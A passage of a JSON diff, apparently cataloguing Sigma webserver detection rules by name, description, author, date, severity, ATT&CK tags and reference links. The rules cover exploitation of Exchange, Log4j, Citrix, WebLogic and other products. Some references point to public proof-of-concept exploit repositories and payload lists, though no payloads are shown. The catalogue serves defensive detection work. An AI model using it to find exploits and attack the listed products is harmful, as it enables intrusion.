"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access" + ] + }, + "uuid": "6f55f047-112b-4101-ad32-43913f52db46", + "value": "SonicWall SSL/VPN Jarrewrite Exploit" + }, + { + "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/03", + "falsepositive": [ + "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + ], + "filename": "web_exchange_exploitation_hafnium.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", + "value": "Exchange Exploitation Used by HAFNIUM" + }, + { + "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_solarwinds_supernova_webshell.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": 
"a2cee20b-eacc-459f-861d-c02e5d12f1db", + "value": "Solarwinds SUPERNOVA Webshell Access" + }, + { + "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_2894_weblogic_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/LandGrey/CVE-2018-2894", + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.t1505.003", + "cve.2018.2894" + ] + }, + "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "value": "Oracle WebLogic Exploit" + }, + { + "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", + "https://support.citrix.com/article/CTX276688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", + "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" + }, + { + "description": "Detects a successful Grafana 
path traversal exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/08", + "falsepositive": [ + "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" + ], + "filename": "web_cve_2021_43798_grafana.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/search?q=CVE-2021-43798", + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", + "value": "Grafana Path Traversal Exploitation CVE-2021-43798" + }, + { + "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/12", + "falsepositive": [ + "Legitimate apps the use these paths" + ], + "filename": "web_jndi_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/pimps/JNDI-Exploit-Kit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + ], + "tags": "No established tags" + }, + "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", + "value": "JNDIExploit Pattern" + }, + { + "description": "Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/12/11", + "falsepositive": [ + "Vulnerability Scanners" + ], + "filename": "web_cve_2021_27905_apache_solr_exploit.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": 
[ + "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", + "https://twitter.com/sec715/status/1373472323538362371", + "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", + "https://twitter.com/Al1ex4/status/1382981479727128580", + "https://github.com/murataydemir/CVE-2021-27905", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.27905" + ] + }, + "uuid": "0bbcd74b-0596-41a4-94a0-4e88a76ffdb3", + "value": "Potential CVE-2021-27905 Exploitation Attempt" + }, + { + "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2022_27925_exploit.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", + "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://www.yang99.top/index.php/archives/82/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.27925" + ] + }, + "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", + "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" + }, + { + "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", + "level": "high", + 
"logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.36804" + ] + }, + "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", + "value": "Atlassian Bitbucket Command Injection Via Archive API" + }, + { + "description": "Detects SQL Injection attempts via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2020/02/22", + "falsepositive": [ + "Java scripts and CSS Files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_sql_injection_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://github.com/payloadbox/sql-injection-payload-list", + "https://brightsec.com/blog/sql-injection-payloads/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", + "value": "SQL 
Injection Strings" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "web_exchange_owassrf_poc_exploitation.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_poc_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "92d78c63-5a5c-4c40-9b60-463810ffb082", + "value": "OWASSRF Exploitation Attempt Using Public POC - Webserver" + }, + { + "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_26814_wzuh_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978", + "cve.2021.26814" + ] + }, + "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", + "value": "Exploitation of CVE-2021-26814 in Wazuh" + }, + { + "description": "Detects exploitation attempt of the 
OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_exchange_owassrf_exploitation.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "181f49fa-0b21-4665-a98c-a57025ebb8c7", + "value": "Potential OWASSRF Exploitation Attempt - Webserver" + }, + { + "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/31", + "falsepositive": [ + "Serious issues with a configuration or plugin" + ], + "filename": "web_nginx_core_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", + "value": "Nginx Core Dump" + }, + { + "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", + "meta": { + "author": "Sittikorn S", + "creation_date": 
"2021/06/29", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", + "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" + }, + { + "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. 
(dot dot) in the class_key parameter.\n", + "meta": { + "author": "Subhash Popuri (@pbssubhash)", + "creation_date": "2021/08/25", + "falsepositive": [ + "Scanning from Nuclei", + "Unknown" + ], + "filename": "web_cve_2010_5278_exploitation_attempt.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", + "value": "CVE-2010-5278 Exploitation Attempt" + }, + { + "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", + "meta": { + "author": "James Ahearn", + "creation_date": "2019/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_source_code_enumeration.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", + "value": "Source Code Enumeration Detection by Keyword" + }, + { + "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_5902_f5_bigip.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established 
product", + "refs": [ + "https://support.f5.com/csp/article/K52145254", + "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", + "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" + }, + { + "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/24", + "falsepositive": [ + "OVA uploads to your VSphere appliance" + ], + "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://f5.pm/go-59627.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", + "value": "CVE-2021-21972 VSphere Exploitation" + }, + { + "description": "Detects possible exploitation activity or bugs in a web application", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Unstable application", + "Application that misuses the response codes" + ], + "filename": "web_multiple_susp_resp_codes_single_source.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", + "value": "Multiple Suspicious Resp Codes Caused by Single Client" + }, + { + "description": "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/27", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_46169_cacti_exploitation_attempt.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/0xf4n9x/CVE-2022-46169", + "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf", + "https://github.com/rapid7/metasploit-framework/pull/17407", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.46169" + ] + }, + "uuid": "738cb115-881f-4df3-82cc-56ab02fc5192", + "value": "Potential CVE-2022-46169 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j_fields.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + 
"https://news.ycombinator.com/item?id=29504755", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", + "value": "Log4j RCE CVE-2021-44228 in Fields" + }, + { + "description": "Detects access to DEWMODE webshell as described in FIREEYE report", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_unc2546_dewmode_php_webshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", + "value": "DEWMODE Webshell Access" + }, + { + "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.exploit-db.com/exploits/47297", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", + "value": "Pulse Secure Attack CVE-2019-11510" + }, + { + "description": "Detects possible Java payloads in web access logs", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + 
"Legitimate apps" + ], + "filename": "web_java_payload_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + ], + "tags": [ + "cve.2022.26134", + "cve.2021.26084" + ] + }, + "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", + "value": "Java Payload Strings" + }, + { + "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_28480_exchange_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", + "value": "Exchange Exploitation CVE-2021-28480" + }, + { + "description": "Detects XSS attempts injected via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2021/08/15", + "falsepositive": [ + "JavaScripts,CSS Files and PNG files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of 
adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_xss_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/payloadbox/xss-payload-list", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", + "value": "Cross Site Scripting Strings" + }, + { + "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2021.2109" + ] + }, + "uuid": "687f6504-7f44-4549-91fc-f07bab065821", + "value": "Oracle WebLogic Exploit CVE-2021-2109" + }, + { + "description": "Detects path traversal exploitation attempts", + "meta": { + "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "creation_date": "2021/09/25", + "falsepositive": [ + "Happens all the time on systems exposed to the Internet", + "Internal vulnerability scanners" + ], + "filename": "web_path_traversal_exploitation_attempt.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", + "value": "Path Traversal Exploitation Attempts" + }, + { + "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/17", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", + "value": "Sitecore Pre-Auth RCE CVE-2021-42237" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + 
"attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", + "value": "Apache Spark Shell Command Injection - Weblogs" + }, + { + "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_susp_useragents.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", + "value": "Suspicious User-Agents Related To Recon Tools" + }, + { + "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners", + "Legitimate access to the URI" + ], + "filename": "web_cve_2022_31659_vmware_rce.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": 
"efdb2003-a922-48aa-8f37-8b80021a9706", + "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" + }, + { + "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", + "value": "Fortinet CVE-2018-13379 Exploitation" + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/22", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "filename": "web_apache_threading_error.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" + ], + "tags": "No established tags" + }, + "uuid": 